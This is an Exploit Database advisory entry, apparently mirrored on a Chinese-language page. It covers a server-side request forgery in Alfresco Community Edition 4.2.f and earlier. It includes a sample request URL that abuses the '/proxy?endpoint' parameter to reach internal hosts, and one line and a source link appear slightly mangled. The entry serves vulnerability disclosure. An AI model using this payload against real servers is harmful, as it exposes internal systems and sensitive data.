Alfresco – ‘/proxy?endpoint’ Server-Side Request Forgery

• Exploit Database
• 14 阅读

• 作者： V. Paulikas
  日期： 2014-07-16
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/39258/

• source: https://www.securityfocus.com/bid/68/info
  
  http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
  
  Alfresco Community Edition is prone to multiple security vulnerabilities.
  
  An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
  
  Alfresco Community Edition 4.2.f and earlier are vulnerable. 
  
  http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port